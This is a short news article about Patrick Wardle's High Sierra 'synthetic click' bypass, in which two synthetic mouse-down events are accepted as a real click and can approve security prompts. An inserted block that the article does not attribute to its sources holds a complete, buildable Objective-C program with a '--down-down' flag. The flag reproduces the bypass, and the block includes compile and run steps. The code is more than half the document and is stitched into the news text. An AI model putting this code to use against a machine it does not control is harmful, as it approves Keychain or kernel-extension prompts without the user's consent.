According to Threat Post, although Apple tried to fix this vulnerability, the new finding is that "synthetic clicks" still work in certain situations.
Malware can use synthetic clicks to bypass the security prompts that require explicit user approval before a specific action is allowed to proceed.
That can grant access to sensitive components such as the Keychain and permit risky operations such as loading kernel extensions.
The synthetic click problem was previously addressed by a security feature called User-Approved Kernel Extension Loading.
This feature forces the user to manually approve the loading of a kernel extension by clicking the 'Allow' button in the Security & Privacy preference pane.
In macOS High Sierra the operating system filters out synthetic clicks aimed at security alerts, which was meant to make the technique unusable by attackers.
Wardle said in his talk that he discovered the High Sierra flaw by accident while working on something else, but acknowledged that the bypass has certain limitations.
macOS treats a mouse click as two separate events: a 'down' event when the button is pressed and an 'up' event when it is released.
High Sierra, however, mistook two consecutive synthetic 'down' events for a legitimate manual click.
The resulting 'up' event appears to be generated by macOS itself, so it slips past the filter.
While copying and pasting his synthetic mouse click code, Wardle made a mistake and forgot to change the event type of the 'up' event.
After compiling the code he found that the synthetic click worked: two lines of code were enough to completely break the security mechanism.
"Incredibly, this trivial attack succeeded. I'm embarrassed to talk about this mistake, but by comparison it's obviously more embarrassing for Apple."
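The event pair described above, as an added example that is not code from the article or from Wardle's talk: it posts one synthetic left click at a screen coordinate through the public CoreGraphics event API, either as the correct down/up pair or as the down/down pair produced by the copy-paste mistake. The `--down-down` flag, the file name and the helper name are this example's own choices, not anything the page names.

```objc
// Added example (not from the article or from Wardle's tools): post a synthetic
// left click at a screen coordinate via the public CoreGraphics event API.
// Build on macOS:
//   clang -framework Foundation -framework ApplicationServices synthclick.m -o synthclick
// Run:   ./synthclick 100 200              (correct pair: down, then up)
//        ./synthclick 100 200 --down-down  (the copy-paste variant: down, then down)
#import <Foundation/Foundation.h>
#import <ApplicationServices/ApplicationServices.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// Create and post the two events that make up one click. Only the type of the
// second event differs between the variants: a real click is LeftMouseDown
// followed by LeftMouseUp; the variant from the talk sends LeftMouseDown twice.
// Returns NO if either event could not be created.
static BOOL postSyntheticClick(CGPoint where, BOOL downDown) {
    CGEventType secondType = downDown ? kCGEventLeftMouseDown : kCGEventLeftMouseUp;

    CGEventRef first  = CGEventCreateMouseEvent(NULL, kCGEventLeftMouseDown, where, kCGMouseButtonLeft);
    CGEventRef second = CGEventCreateMouseEvent(NULL, secondType,            where, kCGMouseButtonLeft);
    if (first == NULL || second == NULL) {
        if (first)  CFRelease(first);
        if (second) CFRelease(second);
        return NO;
    }

    // kCGHIDEventTap injects at the HID level, so the events are delivered to
    // whatever window is under the cursor, the same path hardware input takes.
    CGEventPost(kCGHIDEventTap, first);
    usleep(50 * 1000);   // short pause between press and release
    CGEventPost(kCGHIDEventTap, second);

    CFRelease(first);
    CFRelease(second);
    return YES;
}

int main(int argc, const char *argv[]) {
    @autoreleasepool {
        if (argc < 3) {
            fprintf(stderr, "usage: %s <x> <y> [--down-down]\n", argv[0]);
            return 1;
        }
        CGPoint target = CGPointMake(strtod(argv[1], NULL), strtod(argv[2], NULL));
        BOOL downDown = (argc > 3 && strcmp(argv[3], "--down-down") == 0);

        // Move the pointer to the target first so the click is delivered with
        // the cursor where a user would have placed it.
        CGEventRef move = CGEventCreateMouseEvent(NULL, kCGEventMouseMoved, target, kCGMouseButtonLeft);
        if (move) {
            CGEventPost(kCGHIDEventTap, move);
            CFRelease(move);
        }

        if (!postSyntheticClick(target, downDown)) {
            NSLog(@"failed to create CGEvent");
            return 1;
        }
        NSLog(@"posted %@ click at (%.0f, %.0f)",
              downDown ? @"down/down" : @"down/up", target.x, target.y);
    }
    return 0;
}
```

Run it only against a machine you control, with a window you want to click positioned at the given coordinates. On Mojave and later the process must be granted Accessibility access in System Preferences before events it posts reach other applications; whether the down/down pair still gets past a security dialog on a given release is exactly the behaviour the article reports for High Sierra and says nothing about for later versions, so treat the flag as a way to reproduce that observation, not as a statement about current macOS.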
It should be pointed out that this vulnerability only affects High Sierra, not earlier versions of macOS, which suggests the bug was introduced recently.
To be more robust, Wardle suggests that macOS 10.14 Mojave should block all synthetic events entirely, although that could also affect legitimate applications that rely on them.
[Compiled from: Apple Insider]